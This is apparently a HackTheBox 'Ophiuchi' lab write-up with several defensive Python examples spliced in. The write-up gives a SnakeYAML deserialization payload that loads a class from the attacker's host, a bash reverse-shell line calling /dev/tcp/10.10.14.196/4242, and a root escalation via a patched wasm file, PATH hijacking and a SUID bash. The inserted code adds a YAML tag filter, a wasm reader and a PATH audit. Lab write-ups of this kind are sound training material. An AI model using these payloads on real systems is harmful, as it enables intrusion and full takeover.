# HackTheBox-Ophiuchi

## Rustscan

```bash
rustscan -a 10.10.10.227 -- -A -sC -sV

The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

Open 10.10.10.227:22
Open 10.10.10.227:8080

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http    syn-ack ttl 63 Apache Tomcat 9.0.38
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Parse YAML
```

## PORT 8080 (HTTP)

There's a YAML parser on the page. I tried to submit something there but got no response.

From the nmap scan we already know that Apache Tomcat 9.0.38 is running, so I tried logging in by going to `/manager`, but wasn't able to log in using the default credentials.

After googling for Apache Tomcat 9.0.38 vulnerabilities/exploits, I found the SnakeYAML deserialization exploit. The exploit relies on SnakeYAML's default constructor resolving a `!!`-tagged node to the Java class of that name and calling its constructor:

```yaml
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://VPN_IP/"]
  ]]
]
```

We'll see a request being made for `/META-INF/services/javax.script.ScriptEngineFactory` on our machine. We can abuse this by mirroring that file structure: a directory `META-INF`, a subdirectory `services`, and inside it a file named `javax.script.ScriptEngineFactory` in which we name our exploit class.

Create a file named `exploit.java`. You can get the Java code from here; in it we'll try to ping our local machine to see whether the exploit works, so that we can then get a reverse shell:
https://github.com/artsploit/yaml-payload/blob/master/src/artsploit/AwesomeScriptEngineFactory.java

Compile the Java file using `javac` and you will get a `.class` file. In `javax.script.ScriptEngineFactory` we will include this content. We also make a folder `snakeyml` holding that `exploit.class` file.

So the file structure will look like this. Start the python3 server or apache2 to host the folder, and submit the same Java class constructor we were calling from the YAML.

After sending it we receive a 500 error. The error shows that we compiled the Java file with the latest version of `javac`, so we need to compile it for class file version 55 (Java 11). We can do this by specifying the release as a parameter to `javac` (thank you StackOverflow).

Now compile it with release version 11, start the python3 web server, and start listening for ICMP packets on the `tun0` interface. On submitting the Java constructor class in the YAML we will see the ICMP packets.

But there was a problem getting a reverse shell: no matter which reverse shell I tried, whether bash or netcat, I couldn't get a shell. So I made a script containing a bash reverse shell:

```bash
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.196/4242 0>&1
```

Now we will download the bash script onto the target machine using `wget`, save it in the `/tmp` directory, and execute it using bash, while also setting up a netcat listener.
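As an added example that is not part of this writeup: the payload above works because SnakeYAML's default `Constructor` maps any `!!name` tag (shorthand for `tag:yaml.org,2002:name`) to a Java class called `name` and instantiates it. The real fix is to parse untrusted input with `SafeConstructor`; an application that cannot change parsers immediately can at least reject documents carrying tags outside the YAML core schema before they reach the parser. The Python below is such a pre-filter, with no PyYAML dependency. The payload and benign documents in it are constructed samples, and the `!!name` and `!<...>` syntaxes it recognises are assumed to cover what arrives through a plain text box; text inside quoted scalars can still produce false positives, which is why this is a filter, not a replacement for a safe constructor.

```python
"""Added example (not from the writeup): a pre-filter that rejects YAML carrying
tags outside the YAML 1.1 core schema. SnakeYAML's default Constructor maps the
shorthand `!!name` (= `tag:yaml.org,2002:name`) to a Java class named `name`
and instantiates it, which is exactly what the writeup's payload relies on."""
import re

# Tags of the YAML 1.1 core schema (the `tag:yaml.org,2002:` namespace).
CORE_TAGS = {"str", "int", "float", "bool", "null", "seq", "map", "set",
             "omap", "pairs", "binary", "timestamp", "merge", "value"}
YAML_NS = "tag:yaml.org,2002:"

# group 1: `!!name` followed by whitespace or a flow-collection opener
# group 2: verbatim form `!<tag:...>`
TAG_RE = re.compile(r"(?<![\w\"'])!!([A-Za-z0-9_.$]+)(?=[\s\[{])|!<([^>]+)>")


def find_unsafe_tags(doc: str) -> list:
    """Return the tag names in `doc` that are not core YAML tags, in order."""
    unsafe = []
    for m in TAG_RE.finditer(doc):
        name = m.group(1) if m.group(1) is not None else m.group(2)
        if name.startswith(YAML_NS):          # verbatim spelling of a `!!` tag
            name = name[len(YAML_NS):]
        if name not in CORE_TAGS:
            unsafe.append(name)
    return unsafe


def is_safe(doc: str) -> bool:
    """True when the document carries no application-specific tags."""
    return not find_unsafe_tags(doc)


# Constructed sample inputs: the writeup's payload shape and a benign document.
PAYLOAD = """\
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://VPN_IP/"]
  ]]
]
"""
BENIGN = """\
name: !!str 123
url: "http://example.invalid/!!notatag"
servers: [web, db]
"""

if __name__ == "__main__":
    for label, doc in (("payload", PAYLOAD), ("benign", BENIGN)):
        verdict = "accept" if is_safe(doc) else "reject"
        print(label, "->", verdict, find_unsafe_tags(doc))
```

Wire `is_safe` in front of the parser call and log the rejected tag names; a `!!java...` or `!!javax...` tag in a request body is a high-confidence detection signal for this class of attack against any SnakeYAML-backed endpoint.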
So I modified our `exploit.java` file accordingly and entered the YAML payload in the parser input box. Once you submit it, on your terminal you'll see the request being made to fetch `exploit.sh`, and you will get a reverse shell.

Stabilize the shell using `python3`.

Since Apache Tomcat is running, we can now search for the Tomcat users file, using the `find` command to locate it. We can try to switch user to `admin` with that password on the machine.

## Privilege escalation

Reading the source code, we can see that it's going to read the WebAssembly binary, then get a value from the `info` function; if that value is not equal to 1 the program prints "Not ready to deploy", otherwise it executes a `deploy.sh` script.

One thing to note is that `main.wasm` and `deploy.sh` are not referenced by absolute path in the source, meaning we can make our own files and then play around with the `PATH` variable.

So first I'm going to download `main.wasm` onto my machine. Here we'll use a tool named WABT (WebAssembly Binary Toolkit):

https://github.com/WebAssembly/wabt

We need to convert `main.wasm` to a `.wat` file, which is the text format of that binary. But before that, let's look at the `info` function in the binary using `wasm-decompile`, which decompiles the binary to a C-like syntax.

We can see that the `info` function returns the value 0, so that's what we need to change.

Convert the `.wasm` file to `.wat`. On opening the `.wat` file we can see that the `const` value is 0. Remember that the source code had the condition `f != 1` (if `f` is not equal to 1): it prints "Not ready to deploy", else it executes the `deploy.sh` script, so change that 0 to 1.

Now we need that back in binary form (`.wasm`), so convert it from `.wat` to `.wasm`. Transfer this onto the target machine into the `/tmp` directory, and also create a `deploy.sh` file there.
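To make the relationship between the `info` function and its `i32.const` concrete, here is an added example that is not part of the writeup and not WABT code: a small Python reader for the WebAssembly binary format that finds the function exported as `info` and reports the constant its body returns. It assumes the module has no imported functions and that the body is a bare `i32.const` followed by `end`, which matches the decompiled `info` described above. The module bytes are constructed by `build_module`; a deployer that gates on this value should, as a defender, assert on the expected result with a reader like this, or better, pin the file's hash, before trusting a `main.wasm` it loads by relative path.

```python
"""Added example (not from the writeup): minimal WebAssembly binary reader that
locates an exported function and returns the `i32.const` its body produces.
Assumption: no imported functions, and the body is `i32.const N` then `end`."""

SEC_TYPE, SEC_FUNC, SEC_EXPORT, SEC_CODE = 1, 3, 7, 10
OP_I32_CONST, OP_END = 0x41, 0x0B
WASM_HEADER = b"\0asm\x01\x00\x00\x00"   # magic + version 1


def uleb(data, pos):
    """Decode an unsigned LEB128 integer; return (value, new_pos)."""
    result, shift = 0, 0
    while True:
        b = data[pos]
        pos += 1
        result |= (b & 0x7F) << shift
        if not b & 0x80:
            return result, pos
        shift += 7


def sleb(data, pos):
    """Decode a signed LEB128 integer (the immediate of i32.const)."""
    result, shift = 0, 0
    while True:
        b = data[pos]
        pos += 1
        result |= (b & 0x7F) << shift
        shift += 7
        if not b & 0x80:
            if b & 0x40:                     # sign-extend
                result -= 1 << shift
            return result, pos


def enc_uleb(n):
    out = bytearray()
    while True:
        b, n = n & 0x7F, n >> 7
        if n:
            out.append(b | 0x80)
        else:
            out.append(b)
            return bytes(out)


def enc_sleb(n):
    out = bytearray()
    while True:
        b, n = n & 0x7F, n >> 7
        done = (n == 0 and not b & 0x40) or (n == -1 and b & 0x40)
        out.append(b if done else b | 0x80)
        if done:
            return bytes(out)


def sections(wasm):
    """Yield (section_id, payload) for every section after the 8-byte header."""
    if wasm[:8] != WASM_HEADER:
        raise ValueError("not a version-1 wasm module")
    pos = 8
    while pos < len(wasm):
        sid = wasm[pos]
        size, pos = uleb(wasm, pos + 1)
        yield sid, wasm[pos:pos + size]
        pos += size


def export_func_index(payload, name):
    """Return the function index exported under `name`, or None."""
    count, pos = uleb(payload, 0)
    for _ in range(count):
        nlen, pos = uleb(payload, pos)
        ename, pos = payload[pos:pos + nlen], pos + nlen
        kind = payload[pos]
        idx, pos = uleb(payload, pos + 1)
        if kind == 0 and ename == name.encode():     # kind 0 = function
            return idx
    return None


def code_bodies(payload):
    """Split the code section into one bytes object per function body."""
    count, pos = uleb(payload, 0)
    bodies = []
    for _ in range(count):
        size, pos = uleb(payload, pos)
        bodies.append(payload[pos:pos + size])
        pos += size
    return bodies


def returned_const(wasm, name="info"):
    """Constant returned by the exported function `name` (e.g. 0 or 1)."""
    secs = dict(sections(wasm))              # one section per id in a simple module
    idx = export_func_index(secs[SEC_EXPORT], name)
    if idx is None:
        raise KeyError(name)
    body = code_bodies(secs[SEC_CODE])[idx]  # valid only without imported funcs
    nlocals, pos = uleb(body, 0)
    for _ in range(nlocals):                 # skip (count, valtype) local decls
        _, pos = uleb(body, pos)
        pos += 1
    if body[pos] != OP_I32_CONST:
        raise ValueError("body does not start with i32.const")
    value, pos = sleb(body, pos + 1)
    if body[pos] != OP_END:
        raise ValueError("body is more than a bare constant")
    return value


def build_module(const_value):
    """Constructed sample: (func (export "info") (result i32) i32.const N)."""
    def section(sid, payload):
        return bytes([sid]) + enc_uleb(len(payload)) + payload
    type_sec = section(SEC_TYPE, b"\x01\x60\x00\x01\x7f")    # one type: () -> i32
    func_sec = section(SEC_FUNC, b"\x01\x00")                # one func of type 0
    exp_sec = section(SEC_EXPORT, b"\x01\x04info\x00\x00")   # export "info" = func 0
    body = b"\x00" + bytes([OP_I32_CONST]) + enc_sleb(const_value) + bytes([OP_END])
    code_sec = section(SEC_CODE, b"\x01" + enc_uleb(len(body)) + body)
    return WASM_HEADER + type_sec + func_sec + exp_sec + code_sec


if __name__ == "__main__":
    for v in (0, 1):
        print("info() returns", returned_const(build_module(v)))
```

The two sample modules differ in a single immediate byte, which is all the `.wat` edit in the writeup changes; anything that decides to run a script based on that value and loads the file from a writable location is trusting one byte it does not control.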
I added a command to that script file that sets the SUID bit on bash. Now add `/tmp` to the `PATH` variable and run the Go source code as sudo.

We can see that `/bin/bash` now has the SUID bit set, which means we can get root by running bash with `-p`. You can also get a reverse shell using netcat (OpenBSD).
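As an added example, not part of the writeup: the root step only works because the deployer invokes `deploy.sh` by bare name, resolved through `PATH`, and sudo is configured such that the caller's `PATH` survives (which the writeup's success implies). The Python below audits that condition: given the bare command names a privileged program invokes and the `PATH` it would run with, it reports the names that resolve into a directory other users can write to. The command names, the `PATH` string and the temporary directory layout in `demo` are constructed for the demonstration.

```python
"""Added example (not from the writeup): audit where bare command names would
resolve under a given PATH and flag hits inside directories writable by other
users, the condition the writeup's PATH trick depends on."""
import os
import shutil
import stat
import tempfile


def resolve_commands(names, path):
    """Map each bare command name to the executable shutil.which would pick
    when searching `path` (a colon-separated string), or None if not found."""
    return {n: shutil.which(n, path=path) for n in names}


def dir_is_writable_by_others(d):
    """True if the directory is group- or world-writable. A sticky bit (as on
    /tmp) stops replacing others' files but not planting a missing one."""
    mode = os.stat(d).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def risky_resolutions(names, path):
    """Return the names whose resolved executable lives in a directory that
    a lower-privileged user could write to."""
    risky = []
    for name, exe in resolve_commands(names, path).items():
        if exe is not None and dir_is_writable_by_others(os.path.dirname(exe)):
            risky.append(name)
    return risky


def demo():
    """Constructed layout: a /tmp-like world-writable directory holding
    deploy.sh is searched before a root-style directory, as in the writeup."""
    with tempfile.TemporaryDirectory() as tmp:
        os.chmod(tmp, 0o1777)                      # drwxrwxrwt, like /tmp
        planted = os.path.join(tmp, "deploy.sh")
        with open(planted, "w") as f:
            f.write("#!/bin/sh\necho planted\n")
        os.chmod(planted, 0o755)

        safe_dir = os.path.join(tmp, "opt")        # stands in for a root-owned dir
        os.mkdir(safe_dir, 0o755)
        real = os.path.join(safe_dir, "realtool")
        with open(real, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(real, 0o755)

        path = tmp + os.pathsep + safe_dir
        return risky_resolutions(["deploy.sh", "realtool"], path)


if __name__ == "__main__":
    print("commands resolving into writable dirs:", demo())
```

Run the audit with the `PATH` the sudo rule actually supplies (for example `sudo -u root env | grep ^PATH=` from the allowed user); a clean result plus absolute paths in the deployer itself, or a sudoers `secure_path`, closes the hole the writeup walks through.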